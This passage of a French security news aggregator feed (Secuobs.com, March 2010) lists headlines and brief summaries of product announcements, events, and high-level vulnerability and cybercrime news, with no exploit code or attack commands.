et la sécurité continues apportées par ces solutions sont d'autant plus importantes que les employés, de plus en plus mobiles, utilisent de nouveaux outils de collaboration et de communication reposant sur le Web Les approches de sécurité traditionnelles sont désormais devenues insuffisantes Cisco AnyConnect Secure - Produits http://www.secuobs.com/revue/news/197229.shtmlhttp://www.secuobs.com/revue/news/197229.shtml Secuobs.com : 2010-03-02 19:41:53 - Global Security Mag Online - Passlogix a annoncé l'intégration de v-GO Single Sign-On v-GO SSO et des autres éléments de sa suite v-GO Access Accelerator avec Microsoft Forefront Identity Manager FIM 2010 Cette intégration permettra aux organisations qui déploient à la fois FIM et v-GO SSO d'automatiser l'approvisionnement et dé provisionnement d'accès SSO à toutes les applications Windows, Web et aux applications mainframe, réduisant ainsi tant les frais d'administration tout en simplifiant l'expérience utilisateur - Produits http://www.secuobs.com/revue/news/197228.shtmlhttp://www.secuobs.com/revue/news/197228.shtml Secuobs.com : 2010-03-02 19:37:12 - Les derniers documents du CERTA. - Une vulnérabilité dans VBScript permet à un utilisateur malintentionné d'exécuter du code arbitraire à distance http://www.secuobs.com/revue/news/197226.shtmlhttp://www.secuobs.com/revue/news/197226.shtml Secuobs.com : 2010-03-02 19:37:12 - Les derniers documents du CERTA. - De multiples vulnérabilités dans BIND permettent de contourner la politique de sécurité http://www.secuobs.com/revue/news/197225.shtmlhttp://www.secuobs.com/revue/news/197225.shtml Secuobs.com : 2010-03-02 19:37:12 - Les derniers documents du CERTA. - Une vulnérabilité dans IBM Lotus iNotes anciennement IBM Lotus Domino Web Access permet à une personne malveillante d'exécuter du code arbitraire à distance http://www.secuobs.com/revue/news/197224.shtmlhttp://www.secuobs.com/revue/news/197224.shtml Secuobs.com : 2010-03-02 19:37:12 - Les derniers documents du CERTA. - Une vulnérabilité dans IBM AIX permet à une personne malintentionnée de provoquer un déni de service à distance http://www.secuobs.com/revue/news/197223.shtmlhttp://www.secuobs.com/revue/news/197223.shtml Secuobs.com : 2010-03-02 19:34:27 - Vigilance vulnérabilités publiques - Lorsque le fichier etc sudoers contient runas_default , un attaquant local peut exécuter une commande avec les privilèges des groupes de root http://www.secuobs.com/revue/news/197221.shtmlhttp://www.secuobs.com/revue/news/197221.shtml Secuobs.com : 2010-03-02 19:34:27 - Vigilance vulnérabilités publiques - Un attaquant local peut corrompre la mémoire du driver aavmker4sys, afin de mener un déni de service ou de faire exécuter du code http://www.secuobs.com/revue/news/197220.shtmlhttp://www.secuobs.com/revue/news/197220.shtml Secuobs.com : 2010-03-02 19:17:59 - L'Atelier.fr Toute l'actualité - Pour ne pas perdre le souvenir des contenus fugaces - textes laissés sur un réseau social, témoignages de joueurs dans des univers virtuels - laissés sur Internet, un britannique travaille sur une archive numérique IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/197216.shtmlhttp://www.secuobs.com/revue/news/197216.shtml Secuobs.com : 2010-03-02 18:43:49 - Global Security Mag Online - Emulex Corporation annonce que son architecture de cartes réseau convergé universelles Universal Converged Network Adapter UCNA OneConnect fournira une intégration Ethernet 10 Gbits s sur cinq plate-formes de serveur IBM de classe entreprise et haut volume, y compris les systèmes x3650 M3, x3550 M3, x3850 X5, x3950 X5 et x3690 X5 et trois plate-formes de serveur IBM BladeCenter, y compris les HS22, HS22V et HX5Le module Emulex Integrated Virtual Fabric Adapter pour les serveurs IBM - Produits http://www.secuobs.com/revue/news/197195.shtmlhttp://www.secuobs.com/revue/news/197195.shtml Secuobs.com : 2010-03-02 18:43:49 - Global Security Mag Online - Sécurité de l'information les tendances 2010 présentées par IDC et Websense Web 20, SaaS, prévention contre la perte de données DLP Quelles sont les priorités Pavillon Cambon Capucines, Paris 1er wwwwebsensecom 18mars Le 18 mars, retrouvez IDC et Websense au Pavillon Cambon Capucines pour débattre des tendances 2010 sur le marché de la sécurité de l'information des difficultés auxquelles se heurtent les professionnels de la sécurité aujourd'hui comment anticiper ces tendances avec une - ÉVÉNEMENTS primetime http://www.secuobs.com/revue/news/197194.shtmlhttp://www.secuobs.com/revue/news/197194.shtml Secuobs.com : 2010-03-02 18:37:05 - Vigilance vulnérabilités publiques - Un attaquant peut envoyer une trame DVB MPEG2-TS malformée, afin de bloquer le système http://www.secuobs.com/revue/news/197191.shtmlhttp://www.secuobs.com/revue/news/197191.shtml Secuobs.com : 2010-03-02 17:37:17 - Global Security Mag Online - L'IBM Institute for Advanced Security aidera les clients, partenaires, universitaires et entreprises à mieux comprendre et traiter les risques liés à la sécurisation du cyberespace Forte de son expertise en logiciels, services, systèmes et R D, cette organisation aidera les gouvernements et les entreprises à travers le monde à se protéger des menaces existantes et futures Aux Etats-Unis, l'IBM Institute for Advanced Security collaborera avec des représentants des secteurs public et privé à - Produits http://www.secuobs.com/revue/news/197170.shtmlhttp://www.secuobs.com/revue/news/197170.shtml Secuobs.com : 2010-03-02 17:37:17 - Global Security Mag Online - Sagem Sécurité groupe Safran vient d'être sélectionnée pour la sécurisation de la Cidade Administrativa de Belo Horizonte, nouveau siège gouvernemental high-tech de l'état de Minas Gerais au Brésil, créé par l'architecte Oscar Niemeyer A ce titre, elle fournira en partenariat avec Task Sistemas une solution de contrôle d'accès comprenant 300 terminaux biométriques de dernière génération MorphoAccess 120 A la pointe de la technologie, les MorphoAccess 120 utilisent les algorithmes Sagem Sécurité, - Marchés http://www.secuobs.com/revue/news/197169.shtmlhttp://www.secuobs.com/revue/news/197169.shtml Secuobs.com : 2010-03-02 17:37:17 - Global Security Mag Online - Une étude menée par Absolute Software, spécialiste des solutions de récupération d'ordinateurs volés, de protection des données et de localisation sécurisée des équipements mobiles, montre qu'en France la majeure partie des vols d'ordinateurs portables sont effectués dans une voiture ou au domicile des utilisateurs Si ces chiffres sont comparables aux résultats d'autres pays européens, le pourcentage de vols dans les transports est nettement plus élevé en France L'étude réalisée en association avec - Investigations http://www.secuobs.com/revue/news/197168.shtmlhttp://www.secuobs.com/revue/news/197168.shtml Secuobs.com : 2010-03-02 17:14:33 - L'Atelier.fr Toute l'actualité - L'université du Kent modélise des individus en mouvement pour étudier sur leur image animée la trajectoire suivie par les ondes d'appareils sans-fil qu'ils portent Le but rendre insensibles ces derniers aux perturbations IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/197163.shtmlhttp://www.secuobs.com/revue/news/197163.shtml Secuobs.com : 2010-03-02 16:29:39 - Comme dans du beurre - Ce sera bientôt une tradition je le sens je co-organise une conférence sur l'intégration des technologies d'authentification forte dans les applications web, qui se tiendra jeudi prochain à Genève Une fois de plus, l'observation de la distribution professionnelle des inscrits révèle une très maigre participation de la part de la communauté de développeurs, architectes et chefs de projets web dans de la région suisse romande Pourquoi Je tiens à préciser que ce billet n'a pas pour vocation de remplir désespérément des sièges plus de 250 personnes sont déjà inscrites à l'évènement, cela dépasse de loin toutes mes attentes et nous pose déjà de nombreuses préoccupations logistiques http://www.secuobs.com/revue/news/197149.shtmlhttp://www.secuobs.com/revue/news/197149.shtml Secuobs.com : 2010-03-02 16:14:23 - Vigilance vulnérabilités publiques - Lorsque le scheduler SCHED_ULE est utilisé, un attaquant local sur un système multiprocesseurs peut bloquer FreeBSD http://www.secuobs.com/revue/news/197146.shtmlhttp://www.secuobs.com/revue/news/197146.shtml Secuobs.com : 2010-03-02 16:14:23 - Vigilance vulnérabilités publiques - Un attaquant peut employer quatre vulnérabilités de TYPO3, afin d'obtenir des informations, de mener un Cross Site Scripting, ou de contourner l'authentification http://www.secuobs.com/revue/news/197145.shtmlhttp://www.secuobs.com/revue/news/197145.shtml Secuobs.com : 2010-03-02 16:14:23 - Vigilance vulnérabilités publiques - Un attaquant local, autorisé à exécuter sudoedit, peut exécuter des commandes avec les droits root http://www.secuobs.com/revue/news/197144.shtmlhttp://www.secuobs.com/revue/news/197144.shtml Secuobs.com : 2010-03-02 15:58:04 - L'Atelier.fr Toute l'actualité - Il est possible de récupérer des données personnelles sur les plates-formes en pair à pair Les individus ne sont pas toujours conscients qu'ils partagent leurs informations avec tout le monde, ou les ont glissées par erreur IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/197142.shtmlhttp://www.secuobs.com/revue/news/197142.shtml Secuobs.com : 2010-03-02 15:13:55 - Global Security Mag Online - L'inscription au JSSI - Journée de la Sécurité des Systèmes d'Information est ouverte Vous trouverez ci-dessous le programme des conférences Programme 8h30 accueil des participants et café 9h00 ouverture de la journée 9h05 première session 9h05 - 9h50 1A, Thibault Koechlin et Jean Baron NBS System Juste une imprimante 9h50 - 10h35 1B, Matthieu Suiche MoonSols Analyse avancée de la mémoire physique de Mac OS X 10h35 - 11h05 pause café 11h05 deuxième session 11h05 - - ÉVÉNEMENTS http://www.secuobs.com/revue/news/197128.shtmlhttp://www.secuobs.com/revue/news/197128.shtml Secuobs.com : 2010-03-02 15:13:55 - Global Security Mag Online - Tech Data International TDI a été sélectionné pour distribuer la gamme de disques durs et solutions de stockage externe de données d'Hitachi Global Storage Technologies Hitachi GST L'accord renforce considérablement le portefeuille de Tech Data et fournit aux revendeurs et aux intégrateurs de toute l'Europe un accès facilité à la gamme GST d'Hitachi, qui répond aux besoins de nombreux marchés, des notebooks et des ordinateurs grand public aux centres de données d'entreprises Les gammes de produits - Business http://www.secuobs.com/revue/news/197127.shtmlhttp://www.secuobs.com/revue/news/197127.shtml Secuobs.com : 2010-03-02 14:21:32 - BUG BROTHER - La conservation des données de connexion logs a été jugée anticonstitutionnelle par la cour constitutionnelle allemande, ce mardi 2 mars 2011 La loi, adoptée en 2008, obligeait les fournisseurs d accès à l internet, et les prestataires de téléphonie, à conserver les traces de ce que font leurs abonnés sur les réseaux de télécommunication y compris leur suite http://www.secuobs.com/revue/news/197113.shtmlhttp://www.secuobs.com/revue/news/197113.shtml Secuobs.com : 2010-03-02 14:10:32 - Journal du Net Solutions l'actualité en bref - Microsoft alerte sur l'existence d'une faille non-corrigée dans Internet Explorer Concernant le moteur VBScript et les fic http://www.secuobs.com/revue/news/197111.shtmlhttp://www.secuobs.com/revue/news/197111.shtml Secuobs.com : 2010-03-02 14:03:40 - Global Security Mag Online - EMC Corporation annonce l'extension de ses services et les nouvelles offres consulting de RSA Ces services aideront les organisations à se conformer aux standards de l'industrie et aux réglementations, à sécuriser les environnements virtualisés et Private Could, réduire le risque de fraude et à améliorer les opérations de sécurité Après des années à considérer la sécurité de l'information comme une stratégie défensive, les entreprises exigent plus de leurs investissements de sécurité Des clients, comme - Produits http://www.secuobs.com/revue/news/197110.shtmlhttp://www.secuobs.com/revue/news/197110.shtml Secuobs.com : 2010-03-02 14:03:40 - Global Security Mag Online - Fortinet annonce sa stratégie sur le marché des solutions de sécurité pour réseaux LAN sans fil avec le lancement de FortiAP , une nouvelle gamme de points d'accès Compatibles avec les dernières normes IEEE 80211n, les appliances FortiAP-210 et FortiAP-220 apportent des fonctions de réseau sans fil adaptées aux besoins des PME et des fournisseurs de services affichant entre 250 et 5 000 utilisateurs en réseau distribué ou en local Les appliances FortiAP fonctionneront avec les appliances de sécurité - Produits http://www.secuobs.com/revue/news/197109.shtmlhttp://www.secuobs.com/revue/news/197109.shtml Secuobs.com : 2010-03-02 13:41:07 - L'Atelier.fr Toute l'actualité - La méthode dite du ''pot de miel'', utilisée pour attirer les infections, connaît ses limites Les pirates peuvent contourner ces pièges en lançant un virus éclaireur qui vérifie si le serveur est opérationnel ou non IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/197105.shtmlhttp://www.secuobs.com/revue/news/197105.shtml Secuobs.com : 2010-03-02 13:07:45 - Global Security Mag Online - FalconStor Software Inc, fournisseur des solutions de protection des données TOTALLY Open , et Violin Memory, fournisseur d'équipements mémoire, annoncent la disponibilité du système de stockage basé sur mémoires flash, capable d'accélérer les lectures écritures des applications critiques La solution FalconStor NSS SAN Accelerator double les performances du SAN en offrant un accès aux données haut débit et faible latence FalconStor NSS SAN Accelerator combine la passerelle FalconStor NSS Network - Produits http://www.secuobs.com/revue/news/197100.shtmlhttp://www.secuobs.com/revue/news/197100.shtml Secuobs.com : 2010-03-02 13:03:22 - CNET France Spécial - Une fausse page créée sur Facebook invitait les internautes à fournir leurs données personnelles pour pouvoir s inscrire comme testeur et recevoir gratuitement, l'iPad, la future tablette Apple C'est Sophos qui a émis l'alerte Lire l'article http://www.secuobs.com/revue/news/197099.shtmlhttp://www.secuobs.com/revue/news/197099.shtml Secuobs.com : 2010-03-02 13:03:01 - Fr Orange Business Sécurité - S PROXYgifOrange Business Services vient d'obtenir une nouvelle certification de sécurité de type ISO 27001-2005 après ISO 15408 l'année dernière sur la mise en œuvre, la fourniture, le support de services info gères et de solution de communication pour les sites de Rennes Cesson-Sévigné Cette certification vérifie la sécurité des outils et des processus mis en oeuvre pour la production des services retenue, via entre autre La production de toutes les preuves liées à la Déclaration d' Applicabilité SOA en anglais Les résultats d'une analyse de risque sur le scope Ebios dans notre cas , Dans ce cadre, Orange Business Services s'est ainsi engagé à maintenir un niveau de sécurité maximum et évolutif L'obtention de la certification s'est déroulée en trois étapes La définition du scope de certification afin de déterminer le périmètre des services à évaluer La conduite de travaux en interne pour répondre aux exigences de sécurité de la norme internationale ISO 27001-2005 Analyse de risque, SOA, La vérification par les auditeurs de la conformité des services au regard de la norme Merci aux équipes de Rennes pour le travail accompli http://www.secuobs.com/revue/news/197098.shtmlhttp://www.secuobs.com/revue/news/197098.shtml Secuobs.com : 2010-03-02 11:53:15 - Global Security Mag Online - Acronis, fournisseur de logiciels pour la gestion du stockage et la restauration de données après sinistre, lance son nouveau calendrier de webinars gratuits et en ligne Ces webinars sont dédiés à la virtualisation et la reprise d'activité après sinistre grâce à Acronis Backup Recovery 10, la dernière génération de solutions de l'éditeur Grâce à ces rendez-vous réguliers, les professionnels de l'informatique ou métiers rencontrant ces problématiques peuvent se familiariser aux solutions proposées - ÉVÉNEMENTS http://www.secuobs.com/revue/news/197083.shtmlhttp://www.secuobs.com/revue/news/197083.shtml Secuobs.com : 2010-03-02 11:53:15 - Global Security Mag Online - Palo Alto Networks , spécialiste de la sécurité des réseaux, a renforcé son technologique et commercial avec un pare-feu de nouvelle génération Le nouveau logiciel PAN-OS 31 de Palo Alto Networks affine le contrôle des applications métier et Web 20 dans les entreprises et les environnements informatiques distribués La société vient de franchir la barre des 1000 clients, dont un certain nombre figurent au classement Fortune 500, telles que Constellation Energy, DTE Energy, Qualcomm et Western - Produits http://www.secuobs.com/revue/news/197082.shtmlhttp://www.secuobs.com/revue/news/197082.shtml Secuobs.com : 2010-03-02 11:46:16 - Vigilance vulnérabilités publiques - Un attaquant local pourrait empêcher l'accès aux utilisateurs authentifié par LDAP http://www.secuobs.com/revue/news/197081.shtmlhttp://www.secuobs.com/revue/news/197081.shtml Secuobs.com : 2010-03-02 11:26:12 - L'Atelier.fr Toute l'actualité - Recourir plus souvent aux réseaux sociaux ou aux plates-formes vidéo permettra de mieux distribuer l'information La Hansard Society recommande aussi de vulgariser et séquencer les messages destinés au public IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/197080.shtmlhttp://www.secuobs.com/revue/news/197080.shtml Secuobs.com : 2010-03-02 10:42:15 - Global Security Mag Online - HAPSIS, cabinet de conseil indépendant en sécurité des systèmes d'information et spécialiste de la dématérialisation, a confié la direction de l'offre dématérialisation et confiance numérique à Thierry Pecquet Expert reconnu sur le marché depuis plus de 20 ans, Thierry Pecquet justifie d'une expertise unique en matière de projets de dématérialisation Cet élément différenciateur permettra à HAPSIS de développer ses parts de marché dans le domaine de la dématérialisation et de proposer à ses clients une - Business http://www.secuobs.com/revue/news/197064.shtmlhttp://www.secuobs.com/revue/news/197064.shtml Secuobs.com : 2010-03-02 10:42:15 - Global Security Mag Online - Claranet, spécialiste européen des services Internet pour les entreprises Infogérance, Hébergement Réseaux Managés lance ClaraCloud, sa nouvelle offre d'infrastructure à la demande Infrastructure as a Service Un des premiers partenaires VSPP Virtual Service Provider Program en Europe de VMware, Claranet se positionne sur le Cloud Computing avec une solution d'IaaS adaptée à l'évolution du marché ClaraCloud des solutions de virtualisation et de Cloud computing associées Les solutions - Produits http://www.secuobs.com/revue/news/197063.shtmlhttp://www.secuobs.com/revue/news/197063.shtml Secuobs.com : 2010-03-02 10:42:15 - Global Security Mag Online - Le spécialiste de la sécurité informatique Avira vient d'acquérir la société CleanPort Ce rapprochement lui permet de renforcer sa gamme de produits dédiée aux postes de travail et serveurs avec la création de la division Avira Managed Security Services AMSS Avec l'offre AMSS, Avira est en mesure d'intégrer de nouveaux services en ligne de sécurité à l'ensemble de sa gamme Ces services seront proposés depuis un centre de données dédié L'acquisition du groupe CleanPort BV ISP Services - Produits http://www.secuobs.com/revue/news/197062.shtmlhttp://www.secuobs.com/revue/news/197062.shtml Secuobs.com : 2010-03-02 10:35:06 - Vigilance vulnérabilités publiques - Lorsqu'un système Linux 2632x propose un service TCP, un attaquant peut forcer une erreur dans le calcul du RTO Retransmission Timeout , qui provoque une surcharge http://www.secuobs.com/revue/news/197061.shtmlhttp://www.secuobs.com/revue/news/197061.shtml Secuobs.com : 2010-03-02 03:57:20 - CNIS mag - Il avait créé le Facebook de la fraude peut-on lire dans les colonnes de la BBC Il, c est Renukanth Subramaniam, le fondateur de DarkMarket, place d échange et forum essentiellement consacrés au trafic de crédences et identités bancaires Infiltré par des agents du FBI, ce réseau d origine Anglaise possédait des ramifications aux Etats-Unis, au Canada, http://www.secuobs.com/revue/news/196994.shtmlhttp://www.secuobs.com/revue/news/196994.shtml Secuobs.com : 2010-03-02 03:57:20 - CNIS mag - Le premier faux Security Essential vient d être découvert par les équipes sécurité de Microsoft Outre le fait d infecter la machine de la victime, ce Troyen baptisé Win32 Fakeinit bloque un nombre impressionnant de noms de domaines Paradoxalement, il s agit essentiellement de sites de services moteurs de recherche, serveurs de streaming, journaux en ligne, hébergeurs http://www.secuobs.com/revue/news/196993.shtmlhttp://www.secuobs.com/revue/news/196993.shtml Secuobs.com : 2010-03-02 03:57:20 - CNIS mag - Si parfois les avocats de Microsoft peuvent faire grincer des dents, ils peuvent aussi contribuer à pacifier le monde en ligne La récente opération b49 , longuement décrite sur le blog officiel de Microsoft, a été couronnée de succès après qu aient été fermés un peu moins de 300 sites Internet membres actifs http://www.secuobs.com/revue/news/196992.shtmlhttp://www.secuobs.com/revue/news/196992.shtml Secuobs.com : 2010-03-01 22:20:36 - Journal du Net Solutions l'actualité en bref - Microsoft alerte sur l'existence d'une faille non-corrigée dans Internet Explorer Concernant le moteur VBScript et les fic http://www.secuobs.com/revue/news/196721.shtmlhttp://www.secuobs.com/revue/news/196721.shtml Secuobs.com : 2010-03-01 20:49:25 - Bruno Kerouanton - Ce n est pas parce qu on fait de la sécurité son métier qu on ne peut pas se faire avoir Je viens de me faire voler 2 768,34 Euros sur ma CB L auteur de ces malversations ne s est pas privé en allant sur Amazon, C-discount, i-Tunes et autres cochonneries pour se faire plaisir, et recharger ses mobiles chez http://www.secuobs.com/revue/news/196689.shtmlhttp://www.secuobs.com/revue/news/196689.shtml Secuobs.com : 2010-03-01 20:28:40 - Journal du Net Solutions l'actualité en bref - L'opération de piratage initiée en décembre dernier depuis l'université de Jiaotong à Shangaï et une école militaire chinoi http://www.secuobs.com/revue/news/196672.shtmlhttp://www.secuobs.com/revue/news/196672.shtml Secuobs.com : 2010-03-01 20:14:25 - Global Security Mag Online - Fin mars, les responsables de fichiers pourront effectuer toutes les démarches obligatoires via le site Internet de la CNIL déclarations, demandes d'autorisation ou d'avis Depuis 2006, toutes les déclarations pouvaient d'ores et déjà s'effectuer en ligne A compter de fin mars 2010, ce sera également le cas pour les procédures d'avis ou d'autorisation préalable de la CNIL Six formulaires seront donc disponibles en ligne déclaration simplifiée, déclaration normale, demande d'autorisation, - Investigations http://www.secuobs.com/revue/news/196671.shtmlhttp://www.secuobs.com/revue/news/196671.shtml Secuobs.com : 2010-03-01 20:14:25 - Global Security Mag Online - Christian ESTROSI, ministre chargé de l'industrie, a désigné l'Association Française pour le Nommage Internet en Coopération AFNIC pour être l'office d'enregistrement en charge de l'extension fr A ce titre, l'Etat et l'AFNIC ont conclu, pour une période de 7 ans, une convention accompagnée d'exigences renforcées dans la gestion du fr Cette désignation marque une étape importante dans le développement du fr Aujourd'hui en tête des nouveaux enregistrements en France, le nombre de noms de - Points de Vue http://www.secuobs.com/revue/news/196670.shtmlhttp://www.secuobs.com/revue/news/196670.shtml Secuobs.com : 2010-03-01 19:39:50 - L'Atelier.fr Toute l'actualité - La capacité de déduction du cerveau humain rend ce dernier plus apte à décrypter certaines informations financières que l'ordinateur Seul un individu est ainsi capable de distinguer une courbe réelle d'une générée au hasard IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/196667.shtmlhttp://www.secuobs.com/revue/news/196667.shtml Secuobs.com : 2010-03-01 19:39:50 - L'Atelier.fr Toute l'actualité - En régulant le débit des paquets de données circulant via des connexions TCP, il est possible d'en améliorer l'encodage et donc la vitesse globale IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/196666.shtmlhttp://www.secuobs.com/revue/news/196666.shtml Secuobs.com : 2010-03-01 18:58:45 - Global Security Mag Online - Chaque semaine les consultants du CERT-XMCO analysent et synthétisent les faits marquants de la semaine Firefox serait sous le coup d'une vulnérabilité 0-day non publiquement divulguée CANVAS a mis à disposition de ses clients uniquement le code permettant l'exploitation de la faille, qui n'a donc pas été portée à la connaissance des développeurs du navigateur Il est possible que Mozilla ne puisse pas fournir rapidement de correctif sans information supplémentaire de la part des chercheurs - Vulnérabilités http://www.secuobs.com/revue/news/196651.shtmlhttp://www.secuobs.com/revue/news/196651.shtml Secuobs.com : 2010-03-01 17:49:00 - Les derniers documents du CERTA. - Plusieurs vulnérabilités présentes dans PHP permettent à un utilisateur distant de contourner la politique de sécurité http://www.secuobs.com/revue/news/196623.shtmlhttp://www.secuobs.com/revue/news/196623.shtml Secuobs.com : 2010-03-01 17:49:00 - Les derniers documents du CERTA. - Une vulnérabilité dans Asterisk permet de contourner la politique de sécurité http://www.secuobs.com/revue/news/196622.shtmlhttp://www.secuobs.com/revue/news/196622.shtml Secuobs.com : 2010-03-01 17:49:00 - Les derniers documents du CERTA. - Une vulnérabilité dans le traitement d'images par Google Picasa est exploitable par un utilisateur malveillant pour compromettre un système vulnérable http://www.secuobs.com/revue/news/196621.shtmlhttp://www.secuobs.com/revue/news/196621.shtml Secuobs.com : 2010-03-01 17:49:00 - Les derniers documents du CERTA. - Une vulnérabilité dans Sudo permet à une personne malintentionnée de contourner la politique de sécurité http://www.secuobs.com/revue/news/196620.shtmlhttp://www.secuobs.com/revue/news/196620.shtml Secuobs.com : 2010-03-01 17:49:00 - Les derniers documents du CERTA. - Une vulnérabilité dans EMC HomeBase Server permet à une personne distante malintentionnée d'exécuter du code arbitraire http://www.secuobs.com/revue/news/196619.shtmlhttp://www.secuobs.com/revue/news/196619.shtml Secuobs.com : 2010-03-01 17:23:35 - L'Atelier.fr Toute l'actualité - Lorsque l'on observe la situation des entreprises françaises présentes dans la vente en ligne, le bilan n'est pas bien rose Pourtant, l'Empire du Milieu n'est pas inaccessible IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/196614.shtmlhttp://www.secuobs.com/revue/news/196614.shtml Secuobs.com : 2010-03-01 16:42:58 - Global Security Mag Online - BT annonce qu'Olivier Campenon reprend la direction des activités du Groupe en France, tout en continuant à superviser les opérations de BT en Scandinavie, en Europe centrale, en Europe de l'Est, au Moyen-Orient et en Afrique A la présidence de BT en France, Olivier Campenon a pour mission d'accompagner le Groupe dans les prochaines étapes de son développement stratégique sur le marché des services informatiques et télécoms Avec 2 600 collaborateurs en France, BT conçoit, intègre et opère les - Business http://www.secuobs.com/revue/news/196601.shtmlhttp://www.secuobs.com/revue/news/196601.shtml Secuobs.com : 2010-03-01 16:42:58 - Global Security Mag Online - Les périphériques amovibles sont les principaux vecteurs de diffusion des malwares ce mois-ci Avec 2 chevaux de Troie, 2 exploits et 1 ver en tête de ce classement des e-menaces, la composition des malwares a quelque peu changé, les exploits étant plus présents en février Le mois de février nous a réservé une surprise Le malware en tête du classement du mois dernier TrojanClickerCM a complètement disparu du panorama actuel La première position du top 5 est désormais détenue par - Info Malwares http://www.secuobs.com/revue/news/196600.shtmlhttp://www.secuobs.com/revue/news/196600.shtml Secuobs.com : 2010-03-01 16:38:14 - CNIS mag - Stéphane Urbajtel, dans la Charente Libre, enquête sur cette inquiétante statistique les logiciels de la région seraient foi de Microsoft piratés à 49pourcents Un écart considérable comparé aux pays anglo-saxons, notamment l Allemagne et l Angleterre Deux pays, doit-on préciser, qui militent fortement pour la pratique de Linux dans les milieux scolaires et Universitaires mais ceci http://www.secuobs.com/revue/news/196599.shtmlhttp://www.secuobs.com/revue/news/196599.shtml Secuobs.com : 2010-03-01 15:16:21 - L'Atelier.fr Toute l'actualité - Le système hybride mis au point par le projet Whoi facilite le transfert des données sous-marines Le tout, sans être énergivore IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/196583.shtmlhttp://www.secuobs.com/revue/news/196583.shtml Secuobs.com : 2010-03-01 13:46:19 - Global Security Mag Online - Parallels annonce l'expansion de ses offres de virtualisation de serveurs pour les environnements Apple en présentant la première solution au monde de type hyperviseur bare metal pour l'Apple Xserve Parallels Server pour Mac Bare Metal Edition Cette nouvelle édition offre une meilleure performance aux applications tournant dans les machines virtuelles sur Xserve Résultat les entreprises peuvent standardiser leur environnement IT sur la plate-forme Apple et les fournisseurs de services cloud - Produits http://www.secuobs.com/revue/news/196563.shtmlhttp://www.secuobs.com/revue/news/196563.shtml Secuobs.com : 2010-03-01 13:23:02 - L'Atelier.fr Toute l'actualité - La révolution Bloom box - Télékinésie pour tous - PHP hiphop grignote des parts de marchés à Apache - Facebook signe un accord avec Paypal - Explosion des e-dechets pour les années à venir - Le dalaï lama twitte - Appli iPhone BFMradio Appli BNP Paribas Spot - L'EyeStop, la station de bus du futur - L'impact de l'iPad sur l'édition - La Nouvelle-Zélande - Start-up Picatrine - Unica propose des services personnalisés - L'e-reputation des patrons du CAC40 - La fin des petites annonces papier - Placecast - Le bug des décodeurs TNT n'inquiète pas les fabricants - Chatroulettecom déconseillé aux enfants - Scanners corporels - Le frenchtech Tour - Acsel - Grandes man uvres dans la Silicon Valley - Mohican IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/196560.shtmlhttp://www.secuobs.com/revue/news/196560.shtml Secuobs.com : 2010-03-01 13:23:02 - L'Atelier.fr Toute l'actualité - Pour utiliser à plein le potentiel des ordinateurs d'une société, des chercheurs britanniques et écossais proposent un système qui partage les ressources informatiques entre les PC d'une organisation IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/196559.shtmlhttp://www.secuobs.com/revue/news/196559.shtml Secuobs.com : 2010-03-01 12:40:07 - Global Security Mag Online - Dans le cadre d'une initiative visant à faciliter, pour toutes les entreprises, l'analyse et l'échange d'informations sur les failles de sécurité, tout en uniformisant la lutte contre la cybercriminalité, Verizon Business a décidé de diffuser publiquement le framework de recherche qu'elle utilise pour réaliser ses Data Breach Investigations Reports Le framework VerIS Verizon Incident-Sharing , dévoilé ce jour, répond à un problème posé à l'ensemble du marché l'absence d'un standard commun pour la - Produits http://www.secuobs.com/revue/news/196552.shtmlhttp://www.secuobs.com/revue/news/196552.shtml Secuobs.com : 2010-03-01 12:40:07 - Global Security Mag Online - HP étend son offre de services de conseil pour aider les entreprises à adopter plus vite des infrastructures de type Cloud Computing afin d'améliorer leur flexibilité Le service HP Cloud Design s'appuie sur une approche structurée, éprouvée, de conception et de déploiement d'infrastructures évolutives de type Cloud Computing pouvant être mises en œuvre rapidement tout en limitant les risques associés aux projets En outre, les principes de conception d'HP garantissent que l'infrastructure déployée - Produits http://www.secuobs.com/revue/news/196551.shtmlhttp://www.secuobs.com/revue/news/196551.shtml Secuobs.com : 2010-03-01 12:40:07 - Global Security Mag Online - Le Groupe LEXSI, 1er groupe Français indépendant spécialisé en sécurité de l'information et gestion des risques, étoffe son programme de formation et propose une série de nouveautés L'offre de formation LEXSI s'articule autour de trois programmes complémentaires SECUR-IT Management Objectif apporter aux acteurs de la sécurité et de la gestion des risques une avance méthodologique confrontée à des retours d'expérience probants A l'issue du programme, chaque participant doit être en mesure de - Formations des Instituts privés http://www.secuobs.com/revue/news/196550.shtmlhttp://www.secuobs.com/revue/news/196550.shtml Secuobs.com : 2010-03-01 12:40:07 - Global Security Mag Online - Riverbed Technology, fournisseur de solutions optimisant les performances de l'infrastructure informatique, au niveau du réseau, des applications et du stockage, annonce le développement de son programme channel mondial Riverbed souhaite ainsi se rapprocher de ses partenaires Les améliorations apportées au programme Riverbed Partner Network RPN conduisent à une offre solide, adaptée à chaque type et taille de partenaire Elles comprennent toujours plus d'avantages pour accompagner la - Business http://www.secuobs.com/revue/news/196549.shtmlhttp://www.secuobs.com/revue/news/196549.shtml Secuobs.com : 2010-03-01 12:35:24 - CNIS mag - Dans la journée du 20 février, Cryptome, serveur spécialisé dans la diffusion d informations déclassifiées ou obtenues en vertu du FOIA Freedom Of Information Act , publie une notice manifestement publique rédigée par les services juridiques de Microsoft Une notice qui explique dans le détail la nature et la durée des informations retenues sur chaque service http://www.secuobs.com/revue/news/196547.shtmlhttp://www.secuobs.com/revue/news/196547.shtml Secuobs.com : 2010-03-01 12:35:24 - CNIS mag - Signalé dans un message de la liste FC, par un papier de Boing Boing et de ComputerWorld, un document prétendument échappé des cabinets de rédaction de l Acta Document qui, entre autres choses, établit la responsabilité des fournisseurs d accès en cas de preuve caractérisée de piratage sur leurs réseaux, permet de fermer un site http://www.secuobs.com/revue/news/196546.shtmlhttp://www.secuobs.com/revue/news/196546.shtml Secuobs.com : 2010-03-01 12:35:09 - CNET France Spécial - L 